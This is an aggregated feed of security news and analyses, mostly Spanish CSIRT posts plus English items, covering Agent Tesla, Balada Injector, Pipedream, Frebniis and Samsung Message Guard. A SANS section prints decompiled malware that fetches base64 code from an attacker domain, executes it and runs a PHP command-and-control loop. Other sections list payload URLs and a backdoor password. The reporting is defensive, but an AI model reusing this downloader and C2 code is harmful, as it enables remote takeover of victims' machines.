Por otro lado, Agent Tesla va a ir buscando en la máquina de la víctima la existencia de distintos softwares e intentará obtener información sensible de los mismos; por ejemplo, credenciales almacenadas. La información recopilada por cada uno de estos programas es almacenada para luego ser enviada al atacante. A su vez, realiza un procedimiento similar al mencionado anteriormente para extraer las cookies almacenadas en los navegadores instalados en la máquina víctima.

Una vez que el malware consiguió toda la información del equipo, el atacante manipulará la computadora para exfiltrarla. Agent Tesla tiene distintos métodos para realizar la exfiltración de información, por ejemplo:

HTTP: Envía la información hacia un servidor controlado por el atacante: Para esta opción el malware descarga, instala y usa como proxy el navegador TOR.

SMTP: Envía la información hacia una cuenta de correo electrónico controlada por el atacante.

FTP: Envía la información hacia un servidor FTP controlado por el atacante: Envía la información hacia un chat privado de Telegram.

Fig. 4. Exfiltración de información mediante SMTP. (Fuente: welivesecurity.com)

El archivo analizado a continuación es el que llega como adjunto en los correos. Se trata de un ejecutable desarrollado con el framework Microsoft .NET que contiene un código malicioso en Visual Basic ofuscado, el cuál se ilustra a continuación:

Fig. 4. Código ofuscado dentro del archivo malicioso. (Fuente: welivesecurity.com)

El principal objetivo del código malicioso es invocar al intérprete de PowerShell para ejecutar otro código malicioso que se encargará de descargar una DLL maliciosa alojada en la siguiente URL: https[:]//firebase.ngrok.io/testing/EXE_DLL.txt.

Una vez descargada la DLL, el código malicioso en PowerShell procede a ejecutarla pasándole como argumento una cadena de caracteres ofuscada. Esta DLL, también desarrollada con el framework Microsoft .NET, va a manipular la cadena de caracteres recibida para obtener así una nueva URL, que en este caso era: http[:]//195.178.120.24/xjkhcjxzvjvxkzvzxkvkzxbcvkzxcbz.txt.

Es así como la DLL se encarga de descargar AgentTesla de esta nueva URL, también se encarga de inyectar el malware sobre el proceso legítimo RegSvcs.exe por medio de la técnica Process Hollowing.

Mecanismos para mitigar vulnerabilidades asociadas

En caso de que no haya ningún indicio de que el correo sea malicioso revisar que ese destinatario sea válido.

No abrir ningún correo si hay motivos para sospechar, ya sea del contenido o de la persona que lo envió.

No descargar archivos adjuntos de correos si duda de su recepción o de cualquier otra cosa.

Tener una política de cambio de contraseñas periódico.

Mantener actualizadas las soluciones de seguridad instaladas en el dispositivo.

IoC

Dominios e IPs detectados en muestrashttps[:]//firebase[.]ngrok[.]ioftp[.]sisoempresarialsas.com195[.]178.120.243[.]22.30.4051[.]161.116.202

Referencia:

https://www.welivesecurity.com/la-es/2023/04/20/operacion-guinea-pig-correos-phishing-malware-agenttesla-mexico-america-latina/

La entrada Malware AgentTesla en América Latina: Análisis técnico y cómo defenderse se publicó primero en CSIRT CEDIA.

CosmicEnergy is OT and ICS malware from Russia, maybe for red teaming, maybe for attack. Updates on Volt Typhoon, China’s battlespace preparation in Guam and elsewhere. In the criminal underworld, Legion malware has been upgraded for the cloud. Johannes Ullrich from SANS examines time gaps in logging. Our guest is Kevin Kirkwood from LogRhythm with a look at extortion attempts and ransomware. And Atlantic hurricane season officially opens next week: time to batten down those digital hatches.

For links to all of today’s stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/102

Selected reading.

COSMICENERGY: New OT Malware Possibly Related To Russian Emergency Response Exercises (Mandiant)

People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection (Joint Advisory)

Volt Typhoon targets US critical infrastructure with living-off-the-land techniques (Microsoft)

China hits back at ‘the empire of hacking’ over Five Eyes US cyber attack claims (ABC)

Updates to Legion: A Cloud Credential Harvester and SMTP Hijacker (Cado)

Legion Malware Upgraded to Target SSH Servers and AWS Credentials (Hacker News)

CISA Warns of Hurricane/Typhoon-Related Scams (Cybersecurity and Infrastructure Security Agency CISA)

Internet-facing RDP servers are an increasingly common vector of compromise. This blog explains how one RDP infection nearly led to the creation of a botnet, had Darktrace AI not alerted the security team as soon as the attack began.

Key Takeaways The Russian Federal Security Services’ (FSB) Snake malware, also known as “Uroburos,” is a highly sophisticated, modular cyber espionage tool used for long-term intelligence collection. Snake malware has been used to steal sensitive documents from NATO member governments, journalists, and other targets of interest to the Russian Federation. Operation MEDUSA, a court-authorised disruption … Arctic Wolf Labs Review of Joint Cybersecurity Advisory on Russian-Backed Snake Malware

Key Takeaways The Russian Federal Security Services’ (FSB) Snake malware, also known as “Uroburos,” is a highly sophisticated, modular cyber espionage tool used for long-term intelligence collection. Snake malware has been used to steal sensitive documents from NATO member governments, journalists, and other targets of interest to the Russian Federation. Operation MEDUSA, a court-authorized disruption … Arctic Wolf Labs Review of Joint Cybersecurity Advisory on Russian-Backed Snake Malware

644963777398b773b07d84bf_blogp%201%20.pn

As threat actors are continually employing novel methods to compromise a network, a growing number of healthcare companies are now having to play catch-up in a fast-evolving threat landscape.

Una campaña activa desde 2017 está explotando vulnerabilidades en temas y plugins de WordPress para inyectar puertas traseras de Linux en un millón de sitios web comprometidos. En una investigación realizada por Sucuri se comparten indicadores de compromiso (IoC) y orientaciones para identificar y eliminar el malware Balada Injector.

Recientemente, el grupo de ciberseguridad Sucuri ha estado rastreando una campaña de infección masiva de WordPress activa desde 2017, pero hasta hace poco nunca se asignó un nombre apropiado. Su investigación estima que más de un millón de sitios web de WordPress han sido infectados por esta campaña en curso para desplegar un malware llamado Balada Injector.

La campaña masiva, según Sucuri de GoDaddy, «aprovecha todas las vulnerabilidades de temas y plugins conocidas y descubiertas recientemente» para vulnerar sitios de WordPress. Sucuri informa que Balada Injector ataca en oleadas que se producen una vez al mes aproximadamente, cada una de ellas utilizando un nombre de dominio recién registrado para eludir las listas de bloqueo. Por lo general, el malware explota vulnerabilidades recién reveladas y desarrolla rutinas de ataque personalizadas en torno al fallo al que se dirige.

El informe se basa en hallazgos recientes de Doctor Web, que detalló una familia de malware Linux que aprovecha fallos en más de dos docenas de plugins y temas para comprometer sitios WordPress vulnerables.

En los últimos años, Balada Injector ha utilizado más de 100 dominios y una serie de métodos para aprovecharse de fallos de seguridad conocidos (por ejemplo, inyección de HTML y URL del sitio), y los atacantes intentan principalmente obtener credenciales de la base de datos en el archivo wp-config.php.

Esta gran cantidad de vectores de ataque también ha creado infecciones de sitios duplicados, con oleadas posteriores dirigidas a sitios ya comprometidos. Sucuri destaca el caso de un sitio que fue atacado 311 veces con 11 versiones distintas de Balada.

Método de ataque

Destino típico de inyección y redirección para el inyector Balada. (Fuente:blog.sucuri.net)

«Esta campaña se identifica fácilmente por su preferencia por la ofuscación String.fromCharCode, el uso de nombres de dominio recién registrados que alojan scripts maliciosos en subdominios aleatorios, y por las redirecciones a varios sitios fraudulentos», afirma Denis Sinegubko, investigador de seguridad.

Los sitios web de redirección incluyen asistencia técnica falsa, premios de lotería fraudulentos y páginas CAPTCHA fraudulentas que instan a los usuarios a activar las notificaciones «Permitir para verificar que no es un robot», lo que permite a los autores enviar anuncios de spam.

Además, los ataques están diseñados para leer o descargar archivos arbitrarios del sitio -incluidas copias de seguridad, volcados de bases de datos, archivos de registro y de error-, así como para buscar herramientas como adminer y phpmyadmin que podrían haber dejado los administradores del sitio al completar las tareas de mantenimiento.

Balada Injector realiza además amplias búsquedas en los directorios de nivel superior asociados al sistema de archivos del sitio web comprometido para localizar directorios con permisos de escritura que pertenecen a otros sitios. «Lo más habitual es que estos sitios pertenezcan al webmaster del sitio comprometido y que todos compartan la misma cuenta de servidor y los mismos permisos de archivo», explica Sinegubko. «De esta manera, comprometer un solo sitio puede potencialmente conceder acceso a varios otros sitios ‘gratis’».

Si estas vías de ataque no están disponibles, la contraseña de administrador se fuerza mediante un conjunto de 74 credenciales predefinidas.

Actividad Post-Infección

Los scripts de Balada se centran en filtrar información confidencial, como credenciales de bases de datos de archivos wp-config.php, por lo que incluso si el propietario del sitio elimina una infección y parchea sus complementos, el actor de la amenaza mantiene su acceso.

La campaña también busca archivos de copia de seguridad y bases de datos, registros de acceso, información de depuración y archivos que puedan contener información confidencial. Sucuri afirma que el actor de la amenaza actualiza con frecuencia la lista de archivos objetivo.

Además, como se ha mencionado anteriormente, el malware busca la presencia de herramientas de administración de bases de datos como Adminer y phpMyAdmin. Si estas herramientas son vulnerables o están mal configuradas, podrían utilizarse para crear nuevos usuarios administradores, extraer información del sitio o inyectar malware persistente en la base de datos.

Backdoors de Balada

Balada inyector, una vez infectada a la víctima, planta múltiples puertas traseras en sitios de WordPress comprometidos para la redundancia, que actúan como puntos de acceso ocultos para los atacantes.

Sucuri informa que en 2022, Balada estaba dejando caer puertas traseras a 176 rutas predefinidas, haciendo que la eliminación completa de la puerta trasera sea una tarea sumamente complicada.

Listado de paths de backdoors generados por Balada. (Fuente:blog.sucuri.net)

Los investigadores afirman que los inyectores Balada no están presentes en todos los sitios comprometidos, ya que un número tan elevado de clientes sería un reto difícil de gestionar. Se estima que los hackers cargaron el malware en sitios web alojados en un servidor privado o virtual privado que muestra signos de no estar correctamente gestionado o descuidado. A partir de ahí, los inyectores buscan sitios web que compartan la misma cuenta de servidor y los mismos permisos de archivo y buscan en ellos directorios con permisos de escritura, empezando por los directorios con privilegios superiores, para realizar infecciones entre sitios.

Este enfoque permite a los actores de la amenaza comprometer fácilmente varios sitios de una sola vez y propagar rápidamente sus puertas traseras teniendo que gestionar un número mínimo de inyectores. Además, las infecciones entre sitios permiten a los atacantes reinfectar los sitios limpiados repetidamente, siempre que se mantenga el acceso al VPS.

Como organización, ¿Qué hacer frente a esta amenaza?

La campaña descubierta recientemente subraya la necesidad de reforzar la seguridad y de adoptar hábitos que la promuevan, como actualizaciones periódicas, educación de los usuarios y reconocimiento de amenazas para minimizar el riesgo de futuros ataques.

Los investigadores compartieron indicadores de compromiso (IoC) y orientaciones para identificar y eliminar el backdoor Balada Injector. Sin embargo, los usuarios que crean que sus sitios web pueden haber sido presa de la campaña maliciosa deben ponerse en contacto con profesionales de la seguridad para obtener ayuda.

Sucuri señala además que la defensa contra los ataques de Balada Injector puede variar de un caso a otro y que no existe un conjunto específico de instrucciones que los administradores puedan seguir para mantener a raya la amenaza, debido a la gran variedad de vectores de infección. Sin embargo, las guías generales de Sucuri para la limpieza de malware en WordPress deberían ser suficientes para bloquear la mayoría de los intentos.

Dado que Balada Injector sigue explotando las vulnerabilidades de los temas y plugins de WordPress, se recomienda a los propietarios y administradores de sitios web que se mantengan alerta y tomen precauciones para proteger sus activos. Por tanto, se recomienda a los usuarios de WordPress que mantengan actualizado el software de su sitio web, eliminen los plugins y temas que no utilicen y utilicen contraseñas de administrador de WordPress seguras. Además, se debe considerar la implementación de la autenticación de dos factores y añadir sistemas de integridad de archivos deberían funcionar lo suficientemente bien como para proteger los sitios web de cualquier amenaza.

Referencia:

https://blog.sucuri.net/2023/04/balada-injector-synopsis-of-a-massive-ongoing-wordpress-malware-campaign.html?web_view=true

La entrada Malware Balada Inyector: Campaña masiva afecta sitios WordPress se publicó primero en CSIRT CEDIA.

Engineer-with-tablet-check-red-generator

In the lead-up to the 2021 Super Bowl, a water treatment plant 15 miles away from Raymond James Stadium in Tampa was targeted in a cyberattack. The perpetrator manipulated the water’s sodium hydroxide levels from 100 parts per million to 11,100 parts per million. This change would have poisoned the water supply. Thanks to the quick action of an observant staff member, the attack was thwarted before any harm could be done. While ransomware and data leaks are concerning, a successful cyberattack on a physical industrial facility could be catastrophic.

Recently, the industrial cybersecurity firm Dragos reported on a development that puts industrial installations at even higher risk. According to the report, in 2022, the Chernovite threat group created Pipedream, a new modular malware designed to attack industrial control systems (ICS). This powerful toolkit has the potential for disruptive and destructive attacks on tens of thousands of crucial industrial devices. The risk impacts entities that are responsible for managing the electrical grid, oil and gas pipelines, water systems and manufacturing plants.

Growing Industrial Control System Threat

Chernovite developers created Pipedream, a modular ICS attack framework that is now the seventh known ICS-specific malware, according to the Dragos report. Pipedream is the first ever cross-industry disruptive and destructive ICS / operational technology (OT) malware. Its existence proves that industrial adversarial capabilities have ramped up considerably.

Dragos states that the Chernovite group possesses a breadth of ICS-specific knowledge beyond what’s observed in other threat actors. The ICS expertise demonstrated in Pipedream includes capabilities to disrupt, degrade and potentially destroy physical processes in industrial environments.

While Pipedream itself is a new ICS capability, its appearance reveals a trend toward more technically capable and adaptable adversaries targeting ICS/OT, as per Dragos. In addition to implementing common ICS/OT-specific protocols, Pipedream improves upon techniques from earlier ICS malware. Threat groups such as Crashoverride and Electrum exploited the OPC Data Access (OPC DA) protocol to manipulate breakers and electrical switchgear. Meanwhile, Chernovite uses a newer but comparable OPC UA protocol.

Dragos has high confidence that a state actor developed Pipedream intending to leverage it for future disruptive or destructive operations. Pipedream’s capabilities provide an adversary with a range of options for learning about a target’s OT network architecture and identifying its assets and processes. This information lays the groundwork for further disruptive and destructive attacks. It also increases an adversary’s knowledge to develop more capabilities to wreak havoc on a much broader scale.

Ransomware Attacks Against Industrial Organizations

While ICS/OT attacks are cause for worry, the industrial sector isn’t immune to ransomware attacks either. Along these lines, the Dragos report also included tidbits of information about ransomware, such as:

Ransomware attacks against industrial organizations increased by 87% over last year
35% more ransomware groups impacted ICS/OT in 2022
Ransomware attacks targeted 437 manufacturing entities in 104 unique manufacturing subsectors.

The Dragos report says, “As ransomware activity increases, it results in more risk for OT networks, particularly networks with poor segmentation.”

5 Critical Controls for Strong ICS/OT Cyber Defense

Dragos recommends following the SANS Five ICS Cybersecurity Critical Controls as a guide for ICS/OT cybersecurity strategy. According to the Dragos report, a review of these controls revealed the following findings along with recommendations on how to improve:

ICS-Specific Incident Response: The evaluation of this critical control showed mixed results. Detection, elevation and plan activation all improved. But scores declined in the ability to communicate, document and recover. Electric utilities showed the best preparedness, followed by oil and gas, while manufacturing performed the worst. Mitigating the potential impact of an incident is different for pipelines, electrical grids and manufacturing plants. A dedicated ICS-specific plan must include the right contact points. This means identifying which employees have the right skills within the plant, plus a well-developed plan of action for specific scenarios at specific locations.

Defensible Architecture: This second critical control includes elements such as segmentation, least privilege, visibility, resilience and automation. Dragos found marked improvements in network segmentation, but 50% of environments still have room to improve. Uncontrolled external connections into OT were found in 53% of Dragos engagements in 2022. OT security strategies start with hardening the environment. This includes removing extraneous OT network access points, maintaining strong policy control at IT/OT interface points and mitigating high-risk vulnerabilities.

ICS Network Visibility: The third critical control evaluation revealed 80% of environments had little or no visibility into traffic and devices in ICS/OT environments. Far too many environments find it difficult to detect and investigate important issues. Maintaining accurate asset inventory is even more challenging. An effective OT security posture maintains an inventory of assets, maps vulnerabilities against those assets (and mitigation plans) and actively monitors traffic for potential threats.

Secure Remote Access: Evaluation of the fourth critical control showed users in 54% of environments using the same credentials for IT systems and OT systems. Remote access is the most common way for threat groups to penetrate OT systems. Credential sharing makes it much easier for threats to cross from IT to OT. Multi-factor authentication (MFA) can and should be applied to OT. Implementing MFA across systems adds an extra layer of security for a relatively small investment.

Risk-Based Vulnerability Management: The final critical control showed that only 15% of CVEs included errors in 2022, down 4% from 2021. But 77% of vulnerabilities still lack mitigation steps. This demonstrates the challenge of employing a risk management approach that can both mitigate the risk of exploitation and reduce production downtime from patches. A successful OT vulnerability management program requires timely awareness of key vulnerabilities with the right information and risk ratings. Also, alternative mitigation strategies will minimize exposure while continuing to operate.

Securing Industrial Processes

The emergence of the Pipedream malware should serve as a wake-up call. Industrial cyberattack capabilities and incidents are increasing, and the results could be disastrous. Meanwhile, the security response contains gaps that require immediate attention.

The post Pipedream Malware Can Disrupt or Destroy Industrial Systems appeared first on Security Intelligence.

Yesterday, I wrote about efile.com serving malicious ake “Browser Updates” to some of its users. This morning, efile.com finally removed the malicious code from its site. The attacker reacted a bit faster and removed some of the additional malware. But luckily, I was able to retrieve some of the malware last evening before it was removed.

Depending on the browser, you may have received one of two binaries. “update.exe” or “installer.exe.” These binaries are quite different. I will focus on “update.exe” for two reasons: It was used for Chrome users, which is the vast majority compared to the other option, Firefox. Secondly, “update.exe” is written in Python, making it much easier to analyze.

BLUF (Bottom Line Up Front)

The attack uses two main executables. The first one, “update.exe,” is a simple downloader downloading and executing the second part. The second part is a PHP script communicating with the command and control server. Its main function is to download and execute additional code as instructed to do so. During the installation, basic system information is sent to the attacker, and the backdoor is made persistent via scheduled/on-boot registry entries.

flow diagram summarizing the malware actions.

Decompiling update.exe

To turn Python scripts into stand-alone executables, PyInstaller is usually used. PyInstaller isn’t a traditional compiler. Instead, it takes the Python bytecode files (.pyc files) and packs them with all the needed libraries, including the Python run time. Finally, it includes a little stub to make it all run.

Reversing such a binary includes two steps:

1. Extract the files PyInstaller used to create the binary. I used pyinstxtractor to do this:

python3 pyinstxtractor.py ../update.exe

2. Decompile the .pyc files. There are about 70 in this case. Most of them are various standard Python libraries. In this case, p.pyc was the “interesting” one.

uncompyle6 p.pyc > p.py

Let’s start by looking at the “main” part of p.py

1 if __name__ == ‘__main__’:
2 try:
3 HWND = win32gui.GetForegroundWindow()
4 win32gui.SetWindowPos(HWND, None, 9999, 9999, 100, 100, win32con.SWP_NOSENDCHANGING | win32con.SWP_SHOWWINDOW)
5 base_path = ‘C:\ProgramData\Browsers’
6 if not os.path.exists(base_path):
7 os.mkdir(base_path)
8 else:
9 if not os.path.exists(base_path + ‘\downloads’):
10 os.mkdir(base_path + ‘\downloads’)
11 init()
12 if is_admin():
13 priv = ‘system’
14 runcode = urllib.request.urlopen(‘https://www.infoamanewonliag.online/update/code.php?priv=’ + priv)
15 runcode = base64.b64decode(runcode.read().decode(‘utf-8’))
16 exec(runcode)
17 urllib.request.urlopen(‘https://www.infoamanewonliag.online/update/installed.php’)
18 else:
19 priv = ‘user’
20 runcode = urllib.request.urlopen(‘https://www.infoamanewonliag.online/update/code.php?priv=’ + priv)
21 runcode = base64.b64decode(runcode.read().decode(‘utf-8’))
22 exec(runcode)
23 urllib.request.urlopen(‘https://www.infoamanewonliag.online/update/installed.php’)
24 except Exception as e:
25 try:
26 print(‘got exception: ‘ + str(e))
27 urllib.request.urlopen(‘https://www.infoamanewonliag.online/update/error.php?detail=’ + base64.urlsafe_b64encode(str(e).encode(‘utf-8’)).decode(‘utf-8’))
28 finally:
29 e = None
30 del e

Lines 3-5: Move the update.exe window off the screen to hide it.
Lines 6-10: Create a “downloads” directory. This will be used later to download additional code.
Line 11: “init” will download additional code (see below)
Line 12: check if the user is an administrator
Line 13-17: Download the code that will make the backdoor persistent and notify the attacker of the success
Line 18-23: If the user isn’t an administrator, the user is asked to re-run the script as an administrator
Line 24-30: Report any errors back to the attacker.

Init

The “init” function is one of the more complex ways I have seen to run a backdoor. The backdoor is implemented in PHP. It is not a “webshell”. Instead, it polls a URL on the attacker’s system and executes any commands that may be sent. It starts out by loading 4 files:

file1 = down_file(‘https://channel-platform.s3.ap-east-1.amazonaws.com/package/7z.exe’);
file2 = down_file(‘https://channel-platform.s3.ap-east-1.amazonaws.com/package/php.7z’);
file3 = down_file(‘https://channel-platform.s3.ap-east-1.amazonaws.com/package/1.php’);
file4 = down_file(‘https://channel-platform.s3.ap-east-1.amazonaws.com/package/php.vbs’);
extract = file1 + ‘ x -y -pphpshell -o’ + base_path + ‘ ‘ + file2;print(extract);os.system(extract)

“file1” appears to be a genuine copy of the compression utility 7zip.
“file 2” is a compressed file containing essentially a complete copy of PHP 7
“file 3” is a PHP script implementing a command and control channel.
“file 4” is a simple VBS script to run 1.php using the PHP interpreter

The main loop of the PHP script:

while(1){
try {
$res = curl_https($api_url.’query’,$data);
logs($res);
$res = json_decode($res,true);
if($res[‘istask’] > 0)
{
handletask($res);
}
sleep(isset($res[‘sleep’])?$res[‘sleep’]:10);

}catch(Exception $e){
logs(‘error ……’);
}
}

The code connects to https://www.infoamanewonliag.online/api/query every 10 seconds and executes the command returned. Any command output is sent back again to the same URL. There are three tasks: (1) execute code, (2) download a file (3) schedule execution, which I don’t think is completely implemented.

IoCs

Here are some of the IoCs you may use to detect this activity:

SHA256 Hashes (all files can be downloaded from Virustotal and Malwarebazaar)

d4f545691c8441b5bcb86535b1d0fd16dc06786eb4080087588cd4d0f388d5ca installer.exe
882d95bdbca75ab9d13486e477ab76b3978e14d6fca30c11ec368f7e5fa1d0cb update.exe
8ac52ca0792baf2a4075fe7c68e5cbe2262da604e2fcdfb9b39656430925c168 php.7z (not malicious)
3771846f010fcad26d593ea3771bee7cf3dec4d7604a8c719cef500fbf491820 1.php
3033913c51e0bf9a13c7ad2d5a481e174a1a3f19041c339e6ac900824793a1c6 php.vbs

Domains Used:

infomanewonliag.online – main command and control domain

URLs for various code snippets:

https://channel-platform.s3.ap-east-1.amazonaws.com/package/7z.exe
https://channel-platform.s3.ap-east-1.amazonaws.com/package/php.7z
https://channel-platform.s3.ap-east-1.amazonaws.com/package/1.php
https://channel-platform.s3.ap-east-1.amazonaws.com/package/php.vbs

Files on the victim’s system:

C:ProgramDataBrowsers
C:ProgramDataBrowsersdownloads1.php
C:ProgramDataBrowsersphpphp.exe

Who did it?

I have no idea. Some of the attack infrastructure is hosted with Alibaba in China, and some Chinese comments are in the code. So probably someone Chinese. The code is very cobbled together, and the clumsy inclusion of PHP points to a not-so-advanced, but maybe still persistent, threat actor.

—
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

El equipo Threat Hunter de Symantec ha detectado nuevo malware llamado Frebniis, el cual abusa de una funcionalidad particular del servidor web IIS para distribuir un backdoor en los sistemas objetivo, eludiendo la detección por parte de las herramientas de seguridad. Según un aviso generado por la entidad de ciberseguridad.

Investigadores de ciberseguridad del equipo Threat Hunter de Symantec han descubierto un nuevo programa malicioso que aprovecha una función legítima de Internet Information Services (IIS) de Microsoft para instalar una puerta trasera en los sistemas atacados.

Internet Information Services (IIS) es un servidor web flexible y de uso general de Microsoft que se ejecuta en sistemas Windows para servir las páginas o archivos HTML solicitados. Un servidor web IIS acepta solicitudes de equipos cliente remotos y devuelve la respuesta adecuada. Esta funcionalidad básica permite a los servidores web compartir y entregar información a través de redes de área local (LAN), como intranets corporativas y redes de área amplia (WAN).

Un servidor web puede entregar información a los usuarios en varias formas, como páginas web estáticas codificadas en HTML; a través de intercambios de archivos como descargas y cargas; y documentos de texto, archivos de imagen y más.

En concreto, IIS ofrece una función llamada FREB (Failed Request Event Buffering) que recoge métricas e información sobre las peticiones web recibidas de clientes remotos (direcciones IP, números de puerto, cabeceras HTTP, cookies) ayudando a los administradores del sistema a resolver problemas relacionados con peticiones HTTP fallidas y recuperando de un buffer aquellas que cumplen ciertos criterios.

El nuevo malware, llamado «Frebniis», está abusando precisamente de esta función legítima para ejecutar código malicioso en redes previamente comprometidas, mediante la ejecución sigilosa de comandos enviados a través de peticiones web.

Como parte de los ataques Frebniis observados, el malware primero se asegura de que FREB está en uso, tras lo cual accede al proceso IIS para recuperar información sobre dónde está cargada la DLL FREB objetivo (iisfreb.dll).

Según Symantec, los autores de Frebniis han determinado que iiscore.dll llama a un puntero de función concreto dentro de iisfreb.dll cada vez que se realiza una petición HTTP a IIS desde un cliente web. El malware procede entonces a inyectar código en el proceso IIS para secuestrar la función sustituyendo su puntero por su propio código malicioso. Este punto de secuestro permite a Frebniis recibir e inspeccionar sigilosamente todas las peticiones HTTP al servidor IIS antes de volver a la función original.

Al secuestrar la función IIS, el backdoor HTTP permanece completamente oculto en el sistema, al tiempo que es capaz de inspeccionar todas las peticiones HTTP para identificar las que tienen un formato especial. Frebniis analiza todas las solicitudes de /logon.aspx o /default.aspx con un parámetro específico, la contraseña, lo que le permite descifrar y ejecutar código .NET cuando se encuentra una coincidencia de contraseña.

El código proporciona funciones de proxy y ejecución remota de código, lo que permite a los operadores del malware comunicarse con recursos internos cuyo acceso a Internet suele estar bloqueado, así como ejecutar código directamente en memoria mediante peticiones HTTP manipuladas.

El malware soporta los siguientes comandos:

Comandos enviados a Frebniis a través de peticiones HTTP especialmente diseñadas. (Fuente: Symantec)

Como se mencionó anteriormente, el código introducido sería un backdoor .NET que soporta un proxy y la ejecución de código C# directamente en la memoria sin ninguna interacción humana y manteniendo el backdoor completamente invisible. Las instrucciones se proporcionarían al malware a través de los parámetros pasados con las peticiones de autenticación HTTP POST. Si se pasa el valor de una contraseña ( » 7ux4398! » ) como parámetro en la petición HTTP, Frebniis descifraría y ejecutaría comandos escritos en una sección específica del código inyectado y relacionados con el ejecutable .NET con funcionalidad de puerta trasera.

La presencia de un segundo parámetro HTTP suministrado con una cadena codificada en Base64 se utilizaría entonces para comprobar la funcionalidad del proxy (permitiendo a los atacantes alcanzar recursos dentro de la red a través del servidor IIS también objetivos comprometidos y no expuestos en Internet) y la ejecución de código remoto.

Recomendaciones para mitigar el riesgo en organizaciones

Aunque es bien conocido por el Equipo de Investigación de Microsoft 365 Defender el hecho de que los atacantes están utilizando cada vez más las extensiones de Internet Information Services (IIS) como una puerta trasera que les proporciona un mecanismo de persistencia, por el momento no existe ninguna respuesta oficial de Microsoft con respecto a este malware en particular.

Aunque todavía no está claro en qué medida se explota realmente Frebniis o cómo consigue acceder a los sistemas Windows con el servidor IIS a la escucha, una buena regla de seguridad sigue siendo siempre mantener los dispositivos actualizados para reducir las posibilidades de explotar vulnerabilidades, así como utilizar herramientas avanzadas de monitorización del tráfico de red para ayudar a detectar actividades inusuales como éstas y comprobar regularmente los módulos IIS cargados en los servidores IIS expuestos, en particular los servidores Exchange, utilizando las herramientas existentes en la suite de servidores IIS.

Referencia:

https://www.infosecurity-magazine.com/news/frebniis-malware-exploits/

La entrada Consejos para mitigar amenaza de nuevo malware en servicios IIS se publicó primero en CSIRT CEDIA.

Samsung ha anunciado la introducción de una nueva función de sandbox denominada Message Guard, diseñada para proteger los dispositivos frente a los ataques de malware Zero-click permiten al ciberdelincuente lanzar un ataque sin la necesidad de interacción del usuario. Este tipo de ataques emergentes son cada vez más comunes.

En los últimos años, los ciberataques se han vuelto cada vez más sofisticados, ya que los ciberdelincuentes desarrollan e implementan diversas técnicas para acceder a sistemas seguros y explotar a organizaciones vulnerables, llevando a las entidades de defensa cibernética a generar nuevas herramientas de protección de datos y sistemas para mantener la seguridad en el entorno digital. Una de estas novedades es la introducción de la nueva función de Samsung, Message Guard, diseñada para proteger a los usuarios de los ataques de malware Zero-Click.

Los ataques «zero-click» son ataques sofisticados y muy selectivos que aprovechan fallos desconocidos (es decir, «zero-days») en el software para desencadenar la ejecución de código malicioso sin requerir ninguna interacción del usuario.

A diferencia de los métodos tradicionales de explotación remota de un dispositivo, en los que las amenazas recurren a tácticas de phishing para engañar al usuario y conseguir que haga clic en un enlace malicioso o abra un archivo fraudulento, estos ataques evitan por completo la necesidad de recurrir a la ingeniería social y proporcionan al adversario un punto de entrada.

No es raro que las amenazas más sofisticadas se dirijan a los usuarios con exploits que pueden activarse sin ninguna interacción por parte de la víctima. Como ejemplo, Samsung describió un escenario en el que un hacker envía al usuario objetivo un archivo de imagen especialmente diseñado que explota automáticamente una vulnerabilidad -mientras el teléfono está bloqueado en el bolsillo del usuario- para dar al atacante acceso a los mensajes, la galería de fotos y los datos bancarios de la víctima.

La mayoría de los exploits zero-click están diseñados para aprovechar las vulnerabilidades de aplicaciones como las de mensajería, SMS o correo electrónico que reciben y procesan datos no fiables. Como resultado, si existe una vulnerabilidad de seguridad en la forma en que una aplicación interpreta los datos entrantes, un agente de amenazas podría aprovechar esta deficiencia para crear una imagen maliciosa que, cuando se envía al dispositivo de un objetivo, ejecuta automáticamente el código incrustado en ella.

En base a esto, Samsung Message Guard es un ‘sandbox’ avanzado que, cuando llega un archivo de imagen, queda atrapado y aislado del resto del dispositivo. Esto impide que un código malicioso acceda a los archivos del teléfono o interactúe con su sistema operativo. Samsung Message Guard comprueba el archivo bit a bit y lo procesa en un entorno controlado para garantizar que no pueda infectar el resto del dispositivo, siendo la última barrera de seguridad erigida por Samsung, que también incluye la plataforma de seguridad Knox que, según la empresa, ya ofrece protección frente a ataques que utilizan formatos de vídeo y audio.

Arquitectura Message Guard: Capas de protección para aislamiento de malware “Zero-click” (Fuente: Cybersecurity Connect)

El nuevo sistema de seguridad se suma a las múltiples capas de protección ya existentes en Samsung, entre las que destaca Samsung Knox, capaz de ofrecer detección de amenazas y protección contra malware en tiempo real.

La función de seguridad, disponible en Samsung Messages y Google Messages, se limita actualmente a la serie Samsung Galaxy S23, con planes para ampliarla a otros smartphones y tabletas Galaxy a finales de este año que funcionen con One UI 5.1 o superior. Además, la compañía ha comentado que implementará próximamente esta solución para que también funcione con aplicaciones de mensajería de terceros, como pueden ser WhatsApp o Telegram.

Por lo tanto, Message Guard es una importante adición a las funciones de seguridad de una organización, ya que proporciona una capa adicional de protección contra los ataques de malware Zero-click. Mediante una combinación de hardware y software, la función puede evitar la ejecución de aplicaciones maliciosas y, a medida que se generalizan este tipo de ataques, es esencial que los fabricantes de dispositivos móviles ofrezcan funciones de seguridad adicionales para proteger a sus usuarios.

Message Guard de Samsung se encuentra activo por defecto y se ejecuta silenciosamente en segundo plano, funcionando contra una amplia serie de formatos de imagen, incluyendo PNG, JPG/JPEG, GIF, ICO, WEBP, BMP y WBMP.

Referencia:

https://thehackernews.com/2023/02/samsung-introduces-new-feature-to.html

La entrada Samsung lanza sistema de protección contra ataques de malware Zero-Click se publicó primero en CSIRT CEDIA.

What Is Malware? Malware, a portmanteau of the words malicious and software, is any software or program that is designed to disrupt and damage a system or network. It is often employed by hackers purposefully attack and organisation’s network. Common Kinds of Malware Malware can work in a variety of ways to achieve the specific … Malware

In 2022, breakthrough evolution in the development of malware targeting industrial control systems (ICS), scaled ransomware attacks against manufacturing, and geopolitical tensions brought increased attention to the industrial cyber threat landscape, according to the 2022 Dragos ICS/OT Cybersecurity Year in Review. As in previous years, the ICS/OT community have managed a growing number of vulnerabilities, […]

Russia-linked APT group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware.

Russia-linked cyberespionage group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware.

